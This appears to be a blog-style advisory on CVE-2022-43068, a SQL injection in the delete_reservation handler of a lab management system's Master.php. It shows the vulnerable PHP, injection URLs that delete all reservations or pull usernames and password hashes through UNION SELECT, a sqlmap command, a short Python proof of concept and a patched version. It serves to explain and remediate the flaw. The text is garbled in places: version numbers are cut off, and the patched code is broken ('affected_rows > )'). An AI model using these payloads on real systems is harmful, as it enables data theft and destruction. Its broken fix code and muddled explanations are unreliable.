Published: 2024-06
Severity: HIGH
If you’re managing medical labs with the Online Diagnostic Lab Management System v1., you should know about a critical vulnerability found in 2022—CVE-2022-43068. Attackers can exploit this SQL injection flaw through a simple browser or basic tools, possibly gaining access to sensitive patient data or taking over your database. Let’s break down how it works, show the vulnerable code, and discuss how attackers might exploit it (with proof-of-concept snippets). This guide is written simply and exclusively for regular admins and developers—no security jargon.
Target: Online Diagnostic Lab Management System v1.
- Vulnerable Script: /classes/Master.php
Action: Attacker can send crafted SQL in the id parameter when deleting a reservation.
- Possible Impact: Read/delete/modify all data, dump user passwords, destroy application.
The dangerous URL looks like this
http://YOUR-LAB-SITE/classes/Master.php?f=delete_reservation&id=1
The key issue? The id parameter is used directly in SQL with NO validation or protection.
Here’s typical vulnerable code in Master.php (simplified)
if ($_GET['f'] == "delete_reservation") {
$id = $_GET['id'];
// VULNERABLE LINE: Injects $id directly into the query
$sql = "DELETE FROM reservations WHERE id = $id";
$result = $conn->query($sql);
if($result){
echo "Reservation deleted";
} else {
echo "Failed";
}
}
What’s wrong?
There is NO protection! Whatever attacker puts as id is passed straight into SQL.
Let’s say you want to see all users instead of deleting a reservation
http://YOUR-LAB-SITE/classes/Master.php?f=delete_reservation&id=1 OR 1=1
This changes the SQL to
DELETE FROM reservations WHERE id = 1 OR 1=1
Result? ALL reservations are deleted (because 1=1 always matches).
Attackers can use SQL UNION to get data from another table (like users)
http://YOUR-LAB-SITE/classes/Master.php?f=delete_reservation&id=-1 UNION SELECT 1, username, password FROM users --
If output errors or messages are shown, attackers can see usernames and password hashes.
3. Automated Exploitation with sqlmap
The tool sqlmap automates finding and exploiting SQL injection.
Command Example
sqlmap -u "http://YOUR-LAB-SITE/classes/Master.php?f=delete_reservation&id=1" --dbs
This runs tests and lists ALL databases on your server.
Proof-of-Concept Python Exploit
Below is a simple Python script demonstrating how one might test the vulnerability (for educational purposes only!):
import requests
base_url = "http://YOUR-LAB-SITE/classes/Master.php?f=delete_reservation&id=";
payload = "1 OR 1=1"
full_url = base_url + payload
r = requests.get(full_url)
print(r.text)
Better PHP Example
if ($_GET['f'] == "delete_reservation") {
$id = intval($_GET['id']);
$stmt = $conn->prepare("DELETE FROM reservations WHERE id = ?");
$stmt->bind_param("i", $id);
$stmt->execute();
if($stmt->affected_rows > ){
echo "Reservation deleted";
} else {
echo "Failed";
}
}
References
- NVD – CVE-2022-43068
- Exploit-DB Advisory
- Online Diagnostic Lab Management System v1. Sourceforge
Final Thoughts
If you’re running Online Diagnostic Lab Management System v1., patch this now. Until you fix it, you’re a sitting duck for anyone who can access your website. If you’re unsure how to update, ask a developer for help or consider switching to a more secure platform.
Stay alert—SQL injection is still one of the top ways hackers break into web apps. Always validate and sanitize incoming data!
Disclaimer: All code and methods in this article are for educational purposes only. Do not exploit vulnerabilities on systems you do not own or have explicit permission to test.
Timeline
Published on: 11/02/2022 20:15:00 UTC
Last modified on: 11/03/2022 03:21:00 UTC